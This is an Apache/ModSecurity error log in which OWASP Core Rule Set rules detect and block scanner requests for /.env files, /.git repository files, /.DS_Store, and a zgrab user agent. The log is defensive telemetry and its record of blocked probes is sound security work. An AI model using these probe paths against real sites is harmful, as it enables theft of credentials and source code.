[Sat Sep 13 08:26:05.159722 2025] [:error] [pid 2695626] [client 23.180.120.244:55694] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aMUOfZ2pIG8NNQvt5p44EgAAAAg"]
[Sat Sep 13 08:26:05.159966 2025] [:error] [pid 2695626] [client 23.180.120.244:55694] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aMUOfZ2pIG8NNQvt5p44EgAAAAg"]
[Sat Sep 13 08:26:05.160141 2025] [:error] [pid 2695626] [client 23.180.120.244:55694] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aMUOfZ2pIG8NNQvt5p44EgAAAAg"]
[Sat Sep 13 08:26:05.411129 2025] [:error] [pid 2692298] [client 23.180.120.244:55710] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aMUOfeH5V83YU5tbwDETdQAAAAM"]
[Sat Sep 13 08:26:05.411497 2025] [:error] [pid 2692298] [client 23.180.120.244:55710] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aMUOfeH5V83YU5tbwDETdQAAAAM"]
[Sat Sep 13 08:26:05.411740 2025] [:error] [pid 2692298] [client 23.180.120.244:55710] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aMUOfeH5V83YU5tbwDETdQAAAAM"]
[Sat Sep 13 08:26:05.648497 2025] [:error] [pid 2692295] [client 23.180.120.244:55718] [client 23.180.120.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aMUOfXx5A9KjH0PuQraELwAAAAA"]
[Sat Sep 13 08:26:05.648747 2025] [:error] [pid 2692295] [client 23.180.120.244:55718] [client 23.180.120.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aMUOfXx5A9KjH0PuQraELwAAAAA"]
[Sat Sep 13 08:26:05.648936 2025] [:error] [pid 2692295] [client 23.180.120.244:55718] [client 23.180.120.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aMUOfXx5A9KjH0PuQraELwAAAAA"]
[Sat Sep 13 19:47:53.161619 2025] [authz_core:error] [pid 2709324] [client 164.90.208.56:53124] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat Sep 13 19:47:54.246151 2025] [:error] [pid 2709325] [client 164.90.208.56:53152] [client 164.90.208.56] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aMWuSjAKCt5qyxoOip5wQAAAAAg"]
[Sat Sep 13 19:47:54.246424 2025] [:error] [pid 2709325] [client 164.90.208.56:53152] [client 164.90.208.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aMWuSjAKCt5qyxoOip5wQAAAAAg"]
[Sat Sep 13 19:47:54.246589 2025] [:error] [pid 2709325] [client 164.90.208.56:53152] [client 164.90.208.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aMWuSjAKCt5qyxoOip5wQAAAAAg"]
[Sat Sep 13 19:47:54.298015 2025] [:error] [pid 2709278] [client 164.90.208.56:53162] [client 164.90.208.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMWuShvfZ7CC3pDYom2GbQAAAAQ"]
[Sat Sep 13 19:47:54.298213 2025] [:error] [pid 2709278] [client 164.90.208.56:53162] [client 164.90.208.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMWuShvfZ7CC3pDYom2GbQAAAAQ"]
[Sat Sep 13 19:47:54.298376 2025] [:error] [pid 2709278] [client 164.90.208.56:53162] [client 164.90.208.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMWuShvfZ7CC3pDYom2GbQAAAAQ"]
[Sat Sep 13 19:47:54.393450 2025] [:error] [pid 2709325] [client 164.90.208.56:53168] [client 164.90.208.56] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aMWuSjAKCt5qyxoOip5wQQAAAAg"]
[Sat Sep 13 19:47:54.393688 2025] [:error] [pid 2709325] [client 164.90.208.56:53168] [client 164.90.208.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aMWuSjAKCt5qyxoOip5wQQAAAAg"]
[Sat Sep 13 19:47:54.393857 2025] [:error] [pid 2709325] [client 164.90.208.56:53168] [client 164.90.208.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aMWuSjAKCt5qyxoOip5wQQAAAAg"]
[Sun Sep 14 04:00:00.279337 2025] [:error] [pid 2717410] [client 174.129.137.212:36216] [client 174.129.137.212] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aMYhoGAU4eyHqXvSYJg34AAAAAA"]
[Sun Sep 14 04:00:00.279634 2025] [:error] [pid 2717410] [client 174.129.137.212:36216] [client 174.129.137.212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aMYhoGAU4eyHqXvSYJg34AAAAAA"]
[Sun Sep 14 04:00:00.279795 2025] [:error] [pid 2717410] [client 174.129.137.212:36216] [client 174.129.137.212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aMYhoGAU4eyHqXvSYJg34AAAAAA"]
[Sun Sep 14 11:46:47.066739 2025] [:error] [pid 2725201] [client 45.148.10.246:53540] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aMaPB8nlL8emZX2W7DwtzwAAAA8"]
[Sun Sep 14 11:46:47.067004 2025] [:error] [pid 2725201] [client 45.148.10.246:53540] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aMaPB8nlL8emZX2W7DwtzwAAAA8"]
[Sun Sep 14 11:46:47.067206 2025] [:error] [pid 2725201] [client 45.148.10.246:53540] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aMaPB8nlL8emZX2W7DwtzwAAAA8"]
[Sun Sep 14 11:46:49.055957 2025] [:error] [pid 2725199] [client 45.148.10.246:53550] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aMaPCaKvZp1cax6ZqUrzqQAAAAo"]
[Sun Sep 14 11:46:49.056264 2025] [:error] [pid 2725199] [client 45.148.10.246:53550] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aMaPCaKvZp1cax6ZqUrzqQAAAAo"]
[Sun Sep 14 11:46:49.056445 2025] [:error] [pid 2725199] [client 45.148.10.246:53550] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aMaPCaKvZp1cax6ZqUrzqQAAAAo"]
[Sun Sep 14 11:46:51.157368 2025] [:error] [pid 2725199] [client 45.148.10.246:53550] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/objects/info/packs"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/objects/info/packs"] [unique_id "aMaPC6KvZp1cax6ZqUrzqgAAAAo"]
[Sun Sep 14 11:46:51.157577 2025] [:error] [pid 2725199] [client 45.148.10.246:53550] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/objects/info/packs"] [unique_id "aMaPC6KvZp1cax6ZqUrzqgAAAAo"]
[Sun Sep 14 11:46:51.157786 2025] [:error] [pid 2725199] [client 45.148.10.246:53550] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/objects/info/packs"] [unique_id "aMaPC6KvZp1cax6ZqUrzqgAAAAo"]
[Sun Sep 14 11:47:03.797010 2025] [:error] [pid 2717494] [client 45.148.10.246:50378] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/objects/info/packs"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/objects/info/packs"] [unique_id "aMaPFwwXyXwptWmApwc3uAAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.git/objects/info/packs
[Sun Sep 14 11:47:03.797250 2025] [:error] [pid 2717494] [client 45.148.10.246:50378] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/objects/info/packs"] [unique_id "aMaPFwwXyXwptWmApwc3uAAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.git/objects/info/packs
[Sun Sep 14 11:47:03.797411 2025] [:error] [pid 2717494] [client 45.148.10.246:50378] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/objects/info/packs"] [unique_id "aMaPFwwXyXwptWmApwc3uAAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.git/objects/info/packs
[Sun Sep 14 11:47:03.857608 2025] [:error] [pid 2717494] [client 45.148.10.246:50378] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/index"] [unique_id "aMaPFwwXyXwptWmApwc3uQAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.git/index
[Sun Sep 14 11:47:03.857831 2025] [:error] [pid 2717494] [client 45.148.10.246:50378] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/index"] [unique_id "aMaPFwwXyXwptWmApwc3uQAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.git/index
[Sun Sep 14 11:47:03.857986 2025] [:error] [pid 2717494] [client 45.148.10.246:50378] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/index"] [unique_id "aMaPFwwXyXwptWmApwc3uQAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.git/index
[Sun Sep 14 14:35:03.276465 2025] [:error] [pid 2720118] [client 18.224.192.118:41391] [client 18.224.192.118] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aMa2d2XJXtYjt2K02q_z-gAAAA4"]
[Sun Sep 14 14:35:03.276844 2025] [:error] [pid 2720118] [client 18.224.192.118:41391] [client 18.224.192.118] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aMa2d2XJXtYjt2K02q_z-gAAAA4"]
[Sun Sep 14 14:35:03.277025 2025] [:error] [pid 2720118] [client 18.224.192.118:41391] [client 18.224.192.118] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aMa2d2XJXtYjt2K02q_z-gAAAA4"]
